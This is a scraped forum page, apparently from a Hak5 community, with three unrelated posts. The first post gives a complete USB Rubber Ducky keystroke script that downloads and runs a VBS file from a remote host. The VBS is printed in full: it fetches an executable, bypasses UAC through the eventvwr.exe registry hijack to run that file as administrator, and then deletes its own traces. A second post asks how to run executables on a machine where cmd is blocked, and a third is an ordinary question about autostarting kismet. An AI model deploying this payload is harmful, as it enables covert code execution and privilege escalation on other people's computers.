Search the Community

Hello! This is my first post and contribute to this community, one of hopefully many. I am yet to receive my rubber ducky, so while waiting i thought i give writing some scripts a go. I consider the rubber ducky to be the mother of physical access exploits, being able to deploy anything in a very short period of time. DELAY 750 GUI r DELAY 1000 STRING powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://myhost.com/script.txt', '%temp%/run.vbs') ;Start-Process '%temp%/run.vbs'}" DELAY 500 ENTER Above is a basic rubber ducky script that downloads and executes a .vbs script in one line using the "run" prompt in windows. Nothing fancy, fast and easy download and execute, however we are taking this a bit further. (This is the part i cannot yet test myself due to me not having the Rubber ducky at hand, however based on examples, this should be OK, please confirm if you have time) To get maximum speed we are using a 2 step process, getting a low sized script file is much faster then going to the payload itself straight away. This is the script.txt (run.vbs when saved) Sub Main() 'Setting some vars fileurl = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe" filename = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "/pt.exe" 'Download function dim shellobj set shellobj = wscript.createobject("wscript.shell") strlink = fileurl strsaveto = filename set objhttpdownload = createobject("msxml2.xmlhttp" ) objhttpdownload.open "get", strlink, false objhttpdownload.send set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) then objfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 then dim objstreamdownload set objstreamdownload = createobject("adodb.stream") with objstreamdownload .type = 1 .open .write objhttpdownload.responsebody .savetofile strsaveto .close end with set objstreamdownload = nothing end if 'UAC bypass/exploit setup Set WshShell = CreateObject("WScript.Shell") myKey = "HKCU\Software\Classes\mscfile\shell\open\command\" WshShell.RegWrite myKey,filename ,"REG_SZ" 'UAC bypass/exploit trigger CreateObject("WScript.Shell").Run "eventvwr.exe" WScript.Sleep 1000 'UAC bypass/exploit cleanup Set objShell = Wscript.CreateObject("Wscript.Shell") objShell.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\" 'Cleanup removal of this script after completed Set Cleanup = WScript.CreateObject("WScript.Shell") Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True End Sub 'We dont want to display any errors On Error Resume Next Main If Err.Number Then 'on error cleanup and exit set Cleanup = WScript.CreateObject("WScript.Shell") Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True WScript.Quit 4711 End If I have commented this to my best ability. its pretty straight forward and is about 2kb in size It download and executes (in this case putty) as pt.exe in the temp folder of the current windows user. It then proceeds to write the payload file-path as a string value to "HKCU\Software\Classes\mscfile\shell\open\command\", we then trigger "eventvwr.exe" which is a built in windows application, this will launch our payload (pt.exe) as ADMIN on the targeted machine without any form of UAC prompt prompting the user. We then remove the reg-key to avoid issues in the future followed by the vbs script removing itself from the computer leaving little trace. If any point we get an error we also remove the script. . This method of bypassing UAC giving admin rights to any application using the path written as a string in the reg-key works on all versions of windows(From where the UAC system was introduced ofc) as far up as Windows 10 Pro 64Bit Build 1607. Basically 90% of machines. I hope you all enjoyed this, i will be making a short demo video of this to see the deployment speed when i receive my copy of the rubber ducky. Best Regards ~skiddie

Hi, i have a computer where the execute command and the cmd is blocked can i use the rubber ducky to execute a exe file or a batch file directly from the sd card when i plug the usb in? If yes, can you please explain me how? Thanks for the help ^^

OK, so this is something of a continuation of this thread: https://forums.hak5.org/index.php?/topic/32535-wardrive/page-2?hl=kismet Since the topic changed a bit, and it's a little stale, I thought I'd start a new thread. Here goes: So, just as @barry99705 said, kismet_server will not run from one of the boot mode command lines or from the 'execute command' window under settings > advanced in the pinapple web interface, but if I SSH into the pineapple and issue the command, it works as expected. Here is my boot mode command: logger "Boot Mode 100 executing now..."; logger "Starting kismet_server..."; kismet_server And here is the relevant log output (with a couple of extra lines for context): Jan 1 00:00:08 Pineapple daemon.info dnsmasq-dhcp[1833]: DHCPACK(br-lan) [removed] Jan 1 00:00:08 Pineapple daemon.info dnsmasq-dhcp[1833]: DHCPREQUEST(br-lan) [removed] Jan 1 00:00:02 Pineapple user.info sysinit: /bin/sh: kismet_server: not found Jan 1 00:00:02 Pineapple user.notice root: Starting kismet_server... Jan 1 00:00:02 Pineapple user.notice root: Boot Mode 100 executing now... Jan 1 00:00:00 Pineapple user.info sysinit: Wed Jan 1 00:00:00 GMT 2014 Also, for grins, I tried the full path to the command in case PATH variables weren't quite loaded yet (I'm running kismet from my sd card.): logger "Boot Mode 100 executing now..."; logger "Starting kismet_server..."; /sd/usr/bin/kismet_server Resulting in a slightly more curoius error loading libcap.so.2: Jan 1 00:00:03 Pineapple daemon.info dnsmasq-dhcp[1833]: DHCPACK(br-lan) [removed] Jan 1 00:00:03 Pineapple daemon.info dnsmasq-dhcp[1833]: DHCPREQUEST(br-lan) [removed] Jan 1 00:00:02 Pineapple user.info sysinit: /sd/usr/bin/kismet_server: can't load library 'libcap.so.2' Jan 1 00:00:02 Pineapple user.notice root: Starting kismet_server... Jan 1 00:00:02 Pineapple user.notice root: Boot Mode 100 executing now... Jan 1 00:00:00 Pineapple user.info sysinit: Wed Jan 1 00:00:00 GMT 2014 The only other thing I could think of to do, again in case environment variables needed time to load, was delay the command execution via sleep ala: sleep 30 && /sd/usr/bin/kismet_server with the same results in the logs only delayed a bit. Any other ideas on how to get kismet to autorun at boot? This is my first attempt at doing anything interesting with the pineapple, and I don't want to give up until it works. Thanks!